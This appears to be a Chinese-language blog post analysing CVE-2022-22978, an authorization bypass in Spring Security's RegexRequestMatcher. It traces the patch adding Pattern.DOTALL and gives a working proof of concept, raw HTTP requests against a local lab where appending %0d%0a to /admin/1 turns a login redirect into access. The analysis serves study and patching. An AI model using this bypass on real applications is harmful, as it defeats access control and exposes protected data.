CVE-2022-22978 漏洞分析
CVE-2022-22978
In Spring Security versions 5.5.6 and 5.5.7 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with
.in the regular expression are possibly vulnerable to an authorization bypass.
环境搭建
VulEnv/springboot/cve_2022_22978 at master · XuCcc/VulEnv
源码分析
根据漏洞描述 使用 RegexRequestMatcher 的正则表达式中包含 . 会导致绕过。分析Github版本升级 commit [^1] ,在 AntRegexRequestMatcher Optimization · spring-projects/spring-security@7086395 处可以发现,在编译正则的时候添加了一个 Pattern.DOTALL 参数
public final class RegexRequestMatcher implements RequestMatcher {
private static final int DEFAULT = Pattern.DOTALL;
private static final int CASE_INSENSITIVE = DEFAULT | Pattern.CASE_INSENSITIVE;
private static final Log logger = LogFactory.getLog(RegexRequestMatcher.class);
@@ -68,7 +70,7 @@ public RegexRequestMatcher(String pattern, String httpMethod) {
* {@link Pattern#CASE_INSENSITIVE} flag set.
*/
public RegexRequestMatcher(String pattern, String httpMethod, boolean caseInsensitive) {
this.pattern = Pattern.compile(pattern, caseInsensitive ? CASE_INSENSITIVE : DEFAULT);
this.httpMethod = StringUtils.hasText(httpMethod) ? HttpMethod.valueOf(httpMethod) : null;
}
Pattern.DOTALL 用于指定 . 匹配换行符,默认情况下 . 是不匹配换行的 [^2] 那么基本可以断定这是通过换行符来进行绕过。
在 org.springframework.security.web.util.matcher.RegexRequestMatcher#matches处使用 pattern 来对URL进行匹配,如果正则匹配上,则用处理当前的URL,否则直接放行
Exp 编写
GET /admin/1 HTTP/1.1
Host: 127.0.0.1:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E8E29D0409C6C153D1C825E11A344082
Connection: close
HTTP/1.1 302
Set-Cookie: JSESSIONID=ED152B696DF48DA74FB14185AE3E5ED8; Path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Location: http://127.0.0.1:9999/login
Content-Length: 0
Date: Fri, 27 May 2022 03:49:22 GMT
Connection: close
在 path 中注入任意换行符即可绕过admin/.*的权限校验
GET /admin/1%0d%0a HTTP/1.1
Host: 127.0.0.1:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=E8E29D0409C6C153D1C825E11A344082
Connection: close
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 11
Date: Fri, 27 May 2022 03:47:59 GMT
Connection: close
welcome 1
补丁修复
通过加入 Pattern.DOTALL 进行匹配换行符
Reference
Footnote
- https://github.com/spring-projects/spring-security/compare/5.6.3...5.6.4
- https://docs.oracle.com/javase/7/docs/api/java/util/regex/Pattern.html#DOTALL
- 点赞
- 收藏
- 关注作者
评论(0)